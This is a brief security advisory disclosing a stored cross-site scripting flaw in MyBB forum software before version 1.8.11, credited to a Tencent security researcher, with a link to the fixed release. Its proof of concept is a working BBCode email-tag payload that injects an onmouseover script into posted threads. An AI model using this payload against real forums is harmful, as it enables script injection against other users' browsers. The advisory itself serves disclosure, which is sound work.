################################# Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerable version:<1.8.11 Severity:High risk =============== Proof of Concept: ============= 1.post a thread or reply any thread ,write: [email=2"onmouseover="alert(document.location)]hover me[/email] then when useras mouse hover it,XSS attack will occur! ============ Fixed: ============ This vulnerability was fixed in version 1.8.11 https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ ============= Best regards, Zhiyang Zeng of Tencent security platform department